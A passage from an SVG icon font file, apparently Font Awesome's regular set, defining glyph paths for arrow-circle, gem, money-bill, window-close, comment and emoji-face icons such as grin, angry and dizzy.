h67c10.7002 0 16.0996 -12.9004 8.5 -20.5l-99 -99c-4.7002 -4.7002 -12.2998 -4.7002 -17 0l-99 99c-7.5 7.59961 -2.2002 20.5 8.5 20.5h67v116z" />
    <glyph glyph-name="arrow-alt-circle-left" unicode="&#xf359;" 
d="M8 192c0 137 111 248 248 248s248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248zM456 192c0 110.5 -89.5 200 -200 200s-200 -89.5 -200 -200s89.5 -200 200 -200s200 89.5 200 200zM384 212v-40c0 -6.59961 -5.40039 -12 -12 -12h-116v-67
c0 -10.7002 -12.9004 -16 -20.5 -8.5l-99 99c-4.7002 4.7002 -4.7002 12.2998 0 17l99 99c7.59961 7.59961 20.5 2.2002 20.5 -8.5v-67h116c6.59961 0 12 -5.40039 12 -12z" />
    <glyph glyph-name="arrow-alt-circle-right" unicode="&#xf35a;" 
d="M504 192c0 -137 -111 -248 -248 -248s-248 111 -248 248s111 248 248 248s248 -111 248 -248zM56 192c0 -110.5 89.5 -200 200 -200s200 89.5 200 200s-89.5 200 -200 200s-200 -89.5 -200 -200zM128 172v40c0 6.59961 5.40039 12 12 12h116v67
c0 10.7002 12.9004 16 20.5 8.5l99 -99c4.7002 -4.7002 4.7002 -12.2998 0 -17l-99 -99c-7.59961 -7.59961 -20.5 -2.2002 -20.5 8.5v67h-116c-6.59961 0 -12 5.40039 -12 12z" />
    <glyph glyph-name="arrow-alt-circle-up" unicode="&#xf35b;" 
d="M256 -56c-137 0 -248 111 -248 248s111 248 248 248s248 -111 248 -248s-111 -248 -248 -248zM256 392c-110.5 0 -200 -89.5 -200 -200s89.5 -200 200 -200s200 89.5 200 200s-89.5 200 -200 200zM276 64h-40c-6.59961 0 -12 5.40039 -12 12v116h-67
c-10.7002 0 -16 12.9004 -8.5 20.5l99 99c4.7002 4.7002 12.2998 4.7002 17 0l99 -99c7.59961 -7.59961 2.2002 -20.5 -8.5 -20.5h-67v-116c0 -6.59961 -5.40039 -12 -12 -12z" />
    <glyph glyph-name="gem" unicode="&#xf3a5;" horiz-adv-x="576" 
d="M464 448c4.09961 0 7.7998 -2 10.0996 -5.40039l99.9004 -147.199c2.90039 -4.40039 2.59961 -10.1006 -0.700195 -14.2002l-276 -340.8c-4.7998 -5.90039 -13.7998 -5.90039 -18.5996 0l-276 340.8c-3.2998 4 -3.60059 9.7998 -0.700195 14.2002l100 147.199
c2.2002 3.40039 6 5.40039 10 5.40039h352zM444.7 400h-56.7998l51.6992 -96h68.4004zM242.6 400l-51.5996 -96h194l-51.7002 96h-90.7002zM131.3 400l-63.2998 -96h68.4004l51.6992 96h-56.7998zM88.2998 256l119.7 -160l-68.2998 160h-51.4004zM191.2 256l96.7998 -243.3
l96.7998 243.3h-193.6zM368 96l119.6 160h-51.3994z" />
    <glyph glyph-name="money-bill-alt" unicode="&#xf3d1;" horiz-adv-x="640" 
d="M320 304c53.0195 0 96 -50.1396 96 -112c0 -61.8701 -43 -112 -96 -112c-53.0195 0 -96 50.1504 -96 112c0 61.8604 42.9805 112 96 112zM360 136v16c0 4.41992 -3.58008 8 -8 8h-16v88c0 4.41992 -3.58008 8 -8 8h-13.5801h-0.000976562
c-4.01074 0 -9.97266 -1.80566 -13.3086 -4.03027l-15.3301 -10.2197c-1.96777 -1.30957 -3.56445 -4.29004 -3.56445 -6.65332c0 -1.33691 0.601562 -3.32422 1.34375 -4.43652l8.88086 -13.3105c1.30859 -1.9668 4.29004 -3.56445 6.65332 -3.56445
c1.33691 0 3.32422 0.602539 4.43652 1.34473l0.469727 0.310547v-55.4404h-16c-4.41992 0 -8 -3.58008 -8 -8v-16c0 -4.41992 3.58008 -8 8 -8h64c4.41992 0 8 3.58008 8 8zM608 384c17.6699 0 32 -14.3301 32 -32v-320c0 -17.6699 -14.3301 -32 -32 -32h-576
c-17.6699 0 -32 14.3301 -32 32v320c0 17.6699 14.3301 32 32 32h576zM592 112v160c-35.3496 0 -64 28.6504 -64 64h-416c0 -35.3496 -28.6504 -64 -64 -64v-160c35.3496 0 64 -28.6504 64 -64h416c0 35.3496 28.6504 64 64 64z" />
    <glyph glyph-name="window-close" unicode="&#xf410;" 
d="M464 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-416c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h416zM464 22v340c0 3.2998 -2.7002 6 -6 6h-404c-3.2998 0 -6 -2.7002 -6 -6v-340c0 -3.2998 2.7002 -6 6 -6h404c3.2998 0 6 2.7002 6 6z
M356.5 253.4l-61.4004 -61.4004l61.4004 -61.4004c4.59961 -4.59961 4.59961 -12.0996 0 -16.7998l-22.2998 -22.2998c-4.60059 -4.59961 -12.1006 -4.59961 -16.7998 0l-61.4004 61.4004l-61.4004 -61.4004c-4.59961 -4.59961 -12.0996 -4.59961 -16.7998 0
l-22.2998 22.2998c-4.59961 4.60059 -4.59961 12.1006 0 16.7998l61.4004 61.4004l-61.4004 61.4004c-4.59961 4.59961 -4.59961 12.0996 0 16.7998l22.2998 22.2998c4.60059 4.59961 12.1006 4.59961 16.7998 0l61.4004 -61.4004l61.4004 61.4004
c4.59961 4.59961 12.0996 4.59961 16.7998 0l22.2998 -22.2998c4.7002 -4.60059 4.7002 -12.1006 0 -16.7998z" />
    <glyph glyph-name="comment-dots" unicode="&#xf4ad;" 
d="M144 240c17.7002 0 32 -14.2998 32 -32s-14.2998 -32 -32 -32s-32 14.2998 -32 32s14.2998 32 32 32zM256 240c17.7002 0 32 -14.2998 32 -32s-14.2998 -32 -32 -32s-32 14.2998 -32 32s14.2998 32 32 32zM368 240c17.7002 0 32 -14.2998 32 -32s-14.2998 -32 -32 -32
s-32 14.2998 -32 32s14.2998 32 32 32zM256 416c141.4 0 256 -93.0996 256 -208s-114.6 -208 -256 -208c-32.7998 0 -64 5.2002 -92.9004 14.2998c-29.0996 -20.5996 -77.5996 -46.2998 -139.1 -46.2998c-9.59961 0 -18.2998 5.7002 -22.0996 14.5
c-3.80078 8.7998 -2 19 4.59961 26c0.5 0.400391 31.5 33.7998 46.4004 73.2002c-33 35.0996 -52.9004 78.7002 -52.9004 126.3c0 114.9 114.6 208 256 208zM256 48c114.7 0 208 71.7998 208 160s-93.2998 160 -208 160s-208 -71.7998 -208 -160
c0 -42.2002 21.7002 -74.0996 39.7998 -93.4004l20.6006 -21.7998l-10.6006 -28.0996c-5.5 -14.5 -12.5996 -28.1006 -19.8994 -40.2002c23.5996 7.59961 43.1992 18.9004 57.5 29l19.5 13.7998l22.6992 -7.2002c25.3008 -8 51.7002 -12.0996 78.4004 -12.0996z" />
    <glyph glyph-name="smile-wink" unicode="&#xf4da;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM248 -8c110.3 0 200 89.7002 200 200s-89.7002 200 -200 200s-200 -89.7002 -200 -200s89.7002 -200 200 -200zM365.8 138.4c10.2002 -8.5 11.6006 -23.6006 3.10059 -33.8008
c-30 -36 -74.1006 -56.5996 -120.9 -56.5996s-90.9004 20.5996 -120.9 56.5996c-8.39941 10.2002 -7.09961 25.3008 3.10059 33.8008c10.0996 8.39941 25.2998 7.09961 33.7998 -3.10059c20.7998 -25.0996 51.5 -39.3994 84 -39.3994s63.2002 14.3994 84 39.3994
c8.5 10.2002 23.5996 11.6006 33.7998 3.10059zM168 208c-17.7002 0 -32 14.2998 -32 32s14.2998 32 32 32s32 -14.2998 32 -32s-14.2998 -32 -32 -32zM328 268c25.7002 0 55.9004 -16.9004 59.7002 -42.0996c1.7998 -11.1006 -11.2998 -18.2002 -19.7998 -10.8008l-9.5 8.5
c-14.8008 13.2002 -46.2002 13.2002 -61 0l-9.5 -8.5c-8.30078 -7.39941 -21.5 -0.399414 -19.8008 10.8008c4 25.1992 34.2002 42.0996 59.9004 42.0996z" />
    <glyph glyph-name="angry" unicode="&#xf556;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM248 -8c110.3 0 200 89.7002 200 200s-89.7002 200 -200 200s-200 -89.7002 -200 -200s89.7002 -200 200 -200zM248 136c33.5996 0 65.2002 -14.7998 86.7998 -40.5996
c8.40039 -10.2002 7.10059 -25.3008 -3.09961 -33.8008c-10.6006 -8.89941 -25.7002 -6.69922 -33.7998 3c-24.8008 29.7002 -75 29.7002 -99.8008 0c-8.5 -10.1992 -23.5996 -11.5 -33.7998 -3s-11.5996 23.6006 -3.09961 33.8008
c21.5996 25.7998 53.2002 40.5996 86.7998 40.5996zM200 208c0 -17.7002 -14.2998 -32.0996 -32 -32.0996s-32 14.2998 -32 32c0 6.19922 2.2002 11.6992 5.2998 16.5996l-28.2002 8.5c-12.6992 3.7998 -19.8994 17.2002 -16.0996 29.9004
c3.7998 12.6992 17.0996 20 29.9004 16.0996l80 -24c12.6992 -3.7998 19.8994 -17.2002 16.0996 -29.9004c-3.09961 -10.3994 -12.7002 -17.0996 -23 -17.0996zM399 262.9c3.7998 -12.7002 -3.40039 -26.1006 -16.0996 -29.8008l-28.2002 -8.5
c3.09961 -4.89941 5.2998 -10.3994 5.2998 -16.5996c0 -17.7002 -14.2998 -32 -32 -32s-32 14.2998 -32 32c-10.2998 0 -19.9004 6.7002 -23 17.0996c-3.7998 12.7002 3.40039 26.1006 16.0996 29.9004l80 24c12.8008 3.7998 26.1006 -3.40039 29.9004 -16.0996z" />
    <glyph glyph-name="dizzy" unicode="&#xf567;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM248 -8c110.3 0 200 89.7002 200 200s-89.7002 200 -200 200s-200 -89.7002 -200 -200s89.7002 -200 200 -200zM214.2 209.9
c-7.90039 -7.90039 -20.5 -7.90039 -28.4004 -0.200195l-17.7998 17.7998l-17.7998 -17.7998c-7.7998 -7.7998 -20.5 -7.7998 -28.2998 0c-7.80078 7.7998 -7.80078 20.5 0 28.2998l17.8994 17.9004l-17.8994 17.8994c-7.80078 7.7998 -7.80078 20.5 0 28.2998
c7.7998 7.80078 20.5 7.80078 28.2998 0l17.7998 -17.7998l17.9004 17.9004c7.7998 7.7998 20.5 7.7998 28.2998 0s7.7998 -20.5 0 -28.2998l-17.9004 -17.9004l17.9004 -17.7998c7.7998 -7.7998 7.7998 -20.5 0 -28.2998zM374.2 302.1
c7.7002 -7.7998 7.7002 -20.3994 0 -28.1992l-17.9004 -17.9004l17.7998 -18c7.80078 -7.7998 7.80078 -20.5 0 -28.2998c-7.7998 -7.7998 -20.5 -7.7998 -28.2998 0l-17.7998 17.7998l-17.7998 -17.7998c-7.7998 -7.7998 -20.5 -7.7998 -28.2998 0
c-7.80078 7.7998 -7.80078 20.5 0 28.2998l17.8994 17.9004l-17.8994 17.8994c-7.80078 7.7998 -7.80078 20.5 0 28.2998c7.7998 7.80078 20.5 7.80078 28.2998 0l17.7998 -17.7998l17.9004 17.7998c7.7998 7.80078 20.5 7.80078 28.2998 0zM248 176
c35.2998 0 64 -28.7002 64 -64s-28.7002 -64 -64 -64s-64 28.7002 -64 64s28.7002 64 64 64z" />
    <glyph glyph-name="flushed" unicode="&#xf579;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM248 -8c110.3 0 200 89.7002 200 200s-89.7002 200 -200 200s-200 -89.7002 -200 -200s89.7002 -200 200 -200zM344 304c44.2002 0 80 -35.7998 80 -80s-35.7998 -80 -80 -80
s-80 35.7998 -80 80s35.7998 80 80 80zM344 176c26.5 0 48 21.5 48 48s-21.5 48 -48 48s-48 -21.5 -48 -48s21.5 -48 48 -48zM344 248c13.2998 0 24 -10.7002 24 -24s-10.7002 -24 -24 -24s-24 10.7002 -24 24s10.7002 24 24 24zM232 224c0 -44.2002 -35.7998 -80 -80 -80
s-80 35.7998 -80 80s35.7998 80 80 80s80 -35.7998 80 -80zM152 176c26.5 0 48 21.5 48 48s-21.5 48 -48 48s-48 -21.5 -48 -48s21.5 -48 48 -48zM152 248c13.2998 0 24 -10.7002 24 -24s-10.7002 -24 -24 -24s-24 10.7002 -24 24s10.7002 24 24 24zM312 104
c13.2002 0 24 -10.7998 24 -24s-10.7998 -24 -24 -24h-128c-13.2002 0 -24 10.7998 -24 24s10.7998 24 24 24h128z" />
    <glyph glyph-name="frown-open" unicode="&#xf57a;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM248 -8c110.3 0 200 89.7002 200 200s-89.7002 200 -200 200s-200 -89.7002 -200 -200s89.7002 -200 200 -200zM200 240c0 -17.7002 -14.2998 -32 -32 -32s-32 14.2998 -32 32
s14.2998 32 32 32s32 -14.2998 32 -32zM328 272c17.7002 0 32 -14.2998 32 -32s-14.2998 -32 -32 -32s-32 14.2998 -32 32s14.2998 32 32 32zM248 160c35.5996 0 88.7998 -21.2998 95.7998 -61.2002c2 -11.7998 -9.09961 -21.5996 -20.5 -18.0996
c-31.2002 9.59961 -59.3994 15.2998 -75.2998 15.2998s-44.0996 -5.7002 -75.2998 -15.2998c-11.5 -3.40039 -22.5 6.2998 -20.5 18.0996c7 39.9004 60.2002 61.2002 95.7998 61.2002z" />
    <glyph glyph-name="grimace" unicode="&#xf57f;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM248 -8c110.3 0 200 89.7002 200 200s-89.7002 200 -200 200s-200 -89.7002 -200 -200s89.7002 -200 200 -200zM168 208c-17.7002 0 -32 14.2998 -32 32s14.2998 32 32 32
s32 -14.2998 32 -32s-14.2998 -32 -32 -32zM328 208c-17.7002 0 -32 14.2998 -32 32s14.2998 32 32 32s32 -14.2998 32 -32s-14.2998 -32 -32 -32zM344 192c26.5 0 48 -21.5 48 -48v-32c0 -26.5 -21.5 -48 -48 -48h-192c-26.5 0 -48 21.5 -48 48v32c0 26.5 21.5 48 48 48
h192zM176 96v24h-40v-8c0 -8.7998 7.2002 -16 16 -16h24zM176 136v24h-24c-8.7998 0 -16 -7.2002 -16 -16v-8h40zM240 96v24h-48v-24h48zM240 136v24h-48v-24h48zM304 96v24h-48v-24h48zM304 136v24h-48v-24h48zM360 112v8h-40v-24h24c8.7998 0 16 7.2002 16 16zM360 136v8
c0 8.7998 -7.2002 16 -16 16h-24v-24h40z" />
    <glyph glyph-name="grin" unicode="&#xf580;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM248 -8c110.3 0 200 89.7002 200 200s-89.7002 200 -200 200s-200 -89.7002 -200 -200s89.7002 -200 200 -200zM353.6 143.4c10 3.09961 19.3008 -5.5 17.7002 -15.3008
c-8 -47.0996 -71.2998 -80 -123.3 -80s-115.4 32.9004 -123.3 80c-1.7002 9.90039 7.7998 18.4004 17.7002 15.3008c26 -8.30078 64.3994 -13.1006 105.6 -13.1006s79.7002 4.7998 105.6 13.1006zM168 208c-17.7002 0 -32 14.2998 -32 32s14.2998 32 32 32
s32 -14.2998 32 -32s-14.2998 -32 -32 -32zM328 208c-17.7002 0 -32 14.2998 -32 32s14.2998 32 32 32s32 -14.2998 32 -32s-14.2998 -32 -32 -32z" />
    <glyph glyph-name="grin-alt" unicode="&#xf581;" horiz-adv-x="496" 
d="M200.3 200c-7.5 -11.4004 -24.5996 -12 -32.7002 0c-12.3994 18.7002 -15.1992 37.2998 -15.6992 56c0.599609 18.7002 3.2998 37.2998 15.6992 56c7.60059 11.4004 24.7002 12 32.7002 0c12.4004 -18.7002 15.2002 -37.2998 15.7002 -56
c-0.599609 -18.7002 -3.2998 -37.2998 -15.7002 -56zM328.3 200c-7.5 -11.4004 -24.5996 -12 -32.7002 0c-12.3994 18.7002 -15.1992 37.2998 -15.6992 56c0.599609 18.7002 3.2998 37.2998 15.6992 56c7.60059 11.4004 24.7002 12 32.7002 0
c12.4004 -18.7002 15.2002 -37.2998 15.7002 -56c-0.599609 -18.7002 -3.2998 -37.2998 -15.7002 -56zM248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM248 -8c110.3 0 200 89.7002 200 200s-89.7002 200 -200 200
s-200 -89.7002 -200 -200s89.7002 -200 200 -200zM353.6 143.4c10 3.09961 19.3008 -5.5 17.7002 -15.3008c-8 -47.0996 -71.2998 -80 -123.3 -80s-115.4 32.8008 -123.3 80c-1.7002 10 7.7998 18.4004 17.7002 15.3008c26 -8.30078 64.3994 -13.1006 105.6 -13.1006
s79.7002 4.7998 105.6 13.1006z" />
    <glyph glyph-name="grin-beam" unicode="&#xf582;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM248 -8c110.3 0 200 89.7002 200 200s-89.7002 200 -200 200s-200 -89.7002 -200 -200s89.7002 -200 200 -200zM353.6 143.4c10 3.09961 19.3008 -5.5 17.7002 -15.3008
c-8 -47.0996 -71.2998 -80 -123.3 -80s-115.4 32.9004 -123.3 80c-1.7002 10 7.89941 18.4004 17.7002 15.3008c26 -8.30078 64.3994 -13.1006 105.6 -13.1006s79.7002 4.7998 105.6 13.1006zM117.7 216.3c-3.60059 1.10059 -6 4.60059 -5.7002 8.2998
c3.2998 42.1006 32.2002 71.4004 56 71.4004s52.7002 -29.2998 56 -71.4004c0.299805 -3.7998 -2.09961 -7.19922 -5.7002 -8.2998c-3.09961 -1 -7.2002 0 -9.2998 3.7002l-9.5 17c-7.7002 13.7002 -19.2002 21.5996 -31.5 21.5996s-23.7998 -7.89941 -31.5 -21.5996
l-9.5 -17c-1.90039 -3.2002 -5.7998 -4.7998 -9.2998 -3.7002zM277.7 216.3c-3.60059 1.10059 -6 4.60059 -5.7002 8.2998c3.2998 42.1006 32.2002 71.4004 56 71.4004s52.7002 -29.2998 56 -71.4004c0.299805 -3.7998 -2.09961 -7.19922 -5.7002 -8.2998
c-3.09961 -1 -7.2002 0 -9.2998 3.7002l-9.5 17c-7.7002 13.7002 -19.2002 21.5996 -31.5 21.5996s-23.7998 -7.89941 -31.5 -21.5996l-9.5 -17c-1.90039 -3.2002 -5.7998 -4.7998 -9.2998 -3.7002z" />
    <glyph glyph-name="grin-beam-sweat" unicode="&#xf583;" horiz-adv-x="496" 
d="M440 288c-29.5 0 -53.2998 26.2998 -53.2998 58.7002c0 25 31.7002 75.5 46.2002 97.2998c3.5 5.2998 10.5996 5.2998 14.1992 0c14.5 -21.7998 46.2002 -72.2998 46.2002 -97.2998c0 -32.4004 -23.7998 -58.7002 -53.2998 -58.7002zM248 48
c-51.9004 0 -115.3 32.9004 -123.3 80c-1.7002 10 7.89941 18.4004 17.7002 15.2998c26 -8.2998 64.3994 -13.0996 105.6 -13.0996s79.7002 4.7998 105.6 13.0996c10 3.2002 19.4004 -5.39941 17.7002 -15.2998c-8 -47.0996 -71.3994 -80 -123.3 -80zM378.3 216.3
c-3.09961 -0.899414 -7.2002 0.100586 -9.2998 3.7002l-9.5 17c-7.7002 13.7002 -19.2002 21.5996 -31.5 21.5996s-23.7998 -7.89941 -31.5 -21.5996l-9.5 -17c-1.90039 -3.2002 -5.7998 -4.7998 -9.2998 -3.7002c-3.60059 1.10059 -6 4.60059 -5.7002 8.2998
c3.2998 42.1006 32.2002 71.4004 56 71.4004s52.7002 -29.2998 56 -71.4004c0.299805 -3.7998 -2.09961 -7.19922 -5.7002 -8.2998zM483.6 269.2c8 -24.2998 12.4004 -50.2002 12.4004 -77.2002c0 -137 -111 -248 -248 -248s-248 111 -248 248s111 248 248 248
c45.7002 0 88.4004 -12.5996 125.2 -34.2002c-10.9004 -21.5996 -15.5 -36.2002 -17.2002 -45.7002c-31.2002 20.1006 -68.2002 31.9004 -108 31.9004c-110.3 0 -200 -89.7002 -200 -200s89.7002 -200 200 -200s200 89.7002 200 200
c0 22.5 -3.90039 44.0996 -10.7998 64.2998c0.399414 0 21.7998 -2.7998 46.3994 12.9004zM168 258.6c-12.2998 0 -23.7998 -7.7998 -31.5 -21.5996l-9.5 -17c-1.90039 -3.2002 -5.7998 -4.7998 -9.2998 -3.7002c-3.60059 1.10059 -6 4.60059 -5.7002 8.2998
c3.2998 42.1006 32.2002 71.4004 56 71.4004s52.7002 -29.2998 56 -71.4004c0.299805 -3.7998 -2.09961 -7.19922 -5.7002 -8.2998c-3.09961 -1 -7.2002 0 -9.2998 3.7002l-9.5 17c-7.7002 13.7002 -19.2002 21.5996 -31.5 21.5996z" />
    <glyph glyph-name="grin-hearts" unicode="&#xf584;" horiz-adv-x="496" 
d="M353.6 143.4c10 3.09961 19.3008 -5.5 17.7002 -15.3008c-8 -47.0996 -71.2998 -80 -123.3 -80s-115.4 32.8008 -123.3 80c-1.7002 10 7.89941 18.4004 17.7002 15.3008c26 -8.30078 64.3994 -13.1006 105.6 -13.1006s79.7002 4.7998 105.6 13.1006zM200.8 192.3
l-70.2002 18.1006c-20.3994 5.2998 -31.8994 27 -24.1992 47.1992c6.69922 17.7002 26.6992 26.7002 44.8994 22l7.10059 -1.89941l2 7.09961c5.09961 18.1006 22.8994 30.9004 41.5 27.9004c21.3994 -3.40039 34.3994 -24.2002 28.7998 -44.5l-19.4004 -69.9004
c-1.2998 -4.5 -6 -7.2002 -10.5 -6zM389.6 257.6c7.7002 -20.1992 -3.7998 -41.7998 -24.1992 -47.0996l-70.2002 -18.2002c-4.60059 -1.2002 -9.2998 1.5 -10.5 6l-19.4004 69.9004c-5.59961 20.2998 7.40039 41.0996 28.7998 44.5c18.7002 3 36.5 -9.7998 41.5 -27.9004
l2 -7.09961l7.10059 1.89941c18.2002 4.7002 38.2002 -4.39941 44.8994 -22zM248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM248 -8c110.3 0 200 89.7002 200 200s-89.7002 200 -200 200s-200 -89.7002 -200 -200
s89.7002 -200 200 -200z" />
    <glyph glyph-name="grin-squint" unicode="&#xf585;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM248 -8c110.3 0 200 89.7002 200 200s-89.7002 200 -200 200s-200 -89.7002 -200 -200s89.7002 -200 200 -200zM353.6 143.4c10 3.09961 19.3008 -5.5 17.7002 -15.3008
c-8 -47.0996 -71.2998 -80 -123.3 -80s-115.4 32.9004 -123.3 80c-1.7002 9.90039 7.7998 18.4004 17.7002 15.3008c26 -8.30078 64.3994 -13.1006 105.6 -13.1006s79.7002 4.7998 105.6 13.1006zM118.9 184.2c-3.80078 4.39941 -3.90039 11 -0.100586 15.5l33.6006 40.2998
l-33.6006 40.2998c-3.7002 4.5 -3.7002 11 0.100586 15.5c3.89941 4.40039 10.1992 5.5 15.2998 2.5l80 -48c3.59961 -2.2002 5.7998 -6.09961 5.7998 -10.2998s-2.2002 -8.09961 -5.7998 -10.2998l-80 -48c-5.40039 -3.2002 -11.7002 -1.7002 -15.2998 2.5zM361.8 181.7
l-80 48c-3.59961 2.2002 -5.7998 6.09961 -5.7998 10.2998s2.2002 8.09961 5.7998 10.2998l80 48c5.10059 2.90039 11.5 1.90039 15.2998 -2.5c3.80078 -4.5 3.90039 -11 0.100586 -15.5l-33.6006 -40.2998l33.6006 -40.2998c3.7002 -4.5 3.7002 -11 -0.100586 -15.5
c-3.59961 -4.2002 -9.89941 -5.7002 -15.2998 -2.5z" />
    <glyph glyph-name="grin-squint-tears" unicode="&#xf586;" 
d="M117.1 63.9004c6.30078 0.899414 11.7002 -4.5 10.9004 -10.9004c-3.7002 -25.7998 -13.7002 -84 -30.5996 -100.9c-22 -21.8994 -57.9004 -21.5 -80.3008 0.900391c-22.3994 22.4004 -22.7998 58.4004 -0.899414 80.2998
c16.8994 16.9004 75.0996 26.9004 100.899 30.6006zM75.9004 105.6c-19.6006 -3.89941 -35.1006 -8.09961 -47.3008 -12.1992c-39.2998 90.5996 -22.0996 199.899 52 274c48.5 48.3994 111.9 72.5996 175.4 72.5996c38.9004 0 77.7998 -9.2002 113.2 -27.4004
c-4 -12.1992 -8.2002 -28 -12 -48.2998c-30.4004 17.9004 -65 27.7002 -101.2 27.7002c-53.4004 0 -103.6 -20.7998 -141.4 -58.5996c-61.5996 -61.5 -74.2998 -153.4 -38.6992 -227.801zM428.2 293.2c20.2998 3.89941 36.2002 8 48.5 12
c47.8994 -93.2002 32.8994 -210.5 -45.2002 -288.601c-48.5 -48.3994 -111.9 -72.5996 -175.4 -72.5996c-33.6992 0 -67.2998 7 -98.6992 20.5996c4.19922 12.2002 8.2998 27.7002 12.1992 47.2002c26.6006 -12.7998 55.9004 -19.7998 86.4004 -19.7998
c53.4004 0 103.6 20.7998 141.4 58.5996c65.6992 65.7002 75.7998 166 30.7998 242.601zM394.9 320.1c-6.30078 -0.899414 -11.7002 4.5 -10.9004 10.9004c3.7002 25.7998 13.7002 84 30.5996 100.9c22 21.8994 57.9004 21.5 80.3008 -0.900391
c22.3994 -22.4004 22.7998 -58.4004 0.899414 -80.2998c-16.8994 -16.9004 -75.0996 -26.9004 -100.899 -30.6006zM207.9 211.8c3 -3 4.19922 -7.2998 3.19922 -11.5l-22.5996 -90.5c-1.40039 -5.39941 -6.2002 -9.09961 -11.7002 -9.09961h-0.899414
c-5.80078 0.5 -10.5 5.09961 -11 10.8994l-4.80078 52.3008l-52.2998 4.7998c-5.7998 0.5 -10.3994 5.2002 -10.8994 11c-0.400391 5.89941 3.39941 11.2002 9.09961 12.5996l90.5 22.7002c4.2002 1 8.40039 -0.200195 11.4004 -3.2002zM247.6 236.9
c-0.0996094 0 -6.39941 -1.80078 -11.3994 3.19922c-3 3 -4.2002 7.30078 -3.2002 11.4004l22.5996 90.5c1.40039 5.7002 7 9.2002 12.6006 9.09961c5.7998 -0.5 10.5 -5.09961 11 -10.8994l4.7998 -52.2998l52.2998 -4.80078c5.7998 -0.5 10.4004 -5.19922 10.9004 -11
c0.399414 -5.89941 -3.40039 -11.1992 -9.10059 -12.5996zM299.6 148.4c29.1006 29.0996 53 59.5996 65.3008 83.7998c4.89941 9.2998 17.5996 9.89941 23.3994 1.7002c27.7002 -38.9004 6.10059 -106.9 -30.5996 -143.7s-104.8 -58.2998 -143.7 -30.6006
c-8.2998 5.90039 -7.5 18.6006 1.7002 23.4004c24.2002 12.5 54.7998 36.2998 83.8994 65.4004z" />
    <glyph glyph-name="grin-stars" unicode="&#xf587;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM248 -8c110.3 0 200 89.7002 200 200s-89.7002 200 -200 200s-200 -89.7002 -200 -200s89.7002 -200 200 -200zM353.6 143.4c10 3.09961 19.3008 -5.5 17.7002 -15.3008
c-8 -47.0996 -71.2998 -80 -123.3 -80s-115.4 32.8008 -123.3 80c-1.7002 10 7.89941 18.4004 17.7002 15.3008c26 -8.30078 64.3994 -13.1006 105.6 -13.1006s79.7002 4.7998 105.6 13.1006zM125.7 200.9l6.09961 34.8994l-25.3994 24.6006
c-4.60059 4.59961 -1.90039 12.2998 4.2998 13.1992l34.8994 5l15.5 31.6006c2.90039 5.7998 11 5.7998 13.9004 0l15.5 -31.6006l34.9004 -5c6.19922 -1 8.7998 -8.69922 4.2998 -13.1992l-25.4004 -24.6006l6 -34.8994c1 -6.2002 -5.39941 -11 -11 -7.90039
l-31.2998 16.2998l-31.2998 -16.2998c-5.60059 -3.09961 -12 1.7002 -11 7.90039zM385.4 273.6c6.19922 -1 8.89941 -8.59961 4.39941 -13.1992l-25.3994 -24.6006l6 -34.8994c1 -6.2002 -5.40039 -11 -11 -7.90039l-31.3008 16.2998l-31.2998 -16.2998
c-5.59961 -3.09961 -12 1.7002 -11 7.90039l6 34.8994l-25.3994 24.6006c-4.60059 4.59961 -1.90039 12.2998 4.2998 13.1992l34.8994 5l15.5 31.6006c2.90039 5.7998 11 5.7998 13.9004 0l15.5 -31.6006z" />
    <glyph glyph-name="grin-tears" unicode="&#xf588;" horiz-adv-x="640" 
d="M117.1 191.9c6.30078 0.899414 11.7002 -4.5 10.9004 -10.9004c-3.7002 -25.7998 -13.7002 -84 -30.5996 -100.9c-22 -21.8994 -57.9004 -21.5 -80.3008 0.900391c-22.3994 22.4004 -22.7998 58.4004 -0.899414 80.2998c16.8994 16.9004 75.0996 26.9004 100.899 30.6006
zM623.8 161.3c21.9004 -21.8994 21.5 -57.8994 -0.799805 -80.2002c-22.4004 -22.3994 -58.4004 -22.7998 -80.2998 -0.899414c-16.9004 16.8994 -26.9004 75.0996 -30.6006 100.899c-0.899414 6.30078 4.5 11.7002 10.8008 10.8008
c25.7998 -3.7002 84 -13.7002 100.899 -30.6006zM497.2 99.5996c12.3994 -37.2998 25.0996 -43.7998 28.2998 -46.5c-44.5996 -65.7998 -120 -109.1 -205.5 -109.1s-160.9 43.2998 -205.5 109.1c3.09961 2.60059 15.7998 9.10059 28.2998 46.5
c33.4004 -63.8994 100.3 -107.6 177.2 -107.6s143.8 43.7002 177.2 107.6zM122.7 223.5c-2.40039 0.299805 -5 2.5 -49.5 -6.90039c12.3994 125.4 118.1 223.4 246.8 223.4s234.4 -98 246.8 -223.5c-44.2998 9.40039 -47.3994 7.2002 -49.5 7
c-15.2002 95.2998 -97.7998 168.5 -197.3 168.5s-182.1 -73.2002 -197.3 -168.5zM320 48c-51.9004 0 -115.3 32.9004 -123.3 80c-1.7002 10 7.89941 18.4004 17.7002 15.2998c26 -8.2998 64.3994 -13.0996 105.6 -13.0996s79.7002 4.7998 105.6 13.0996
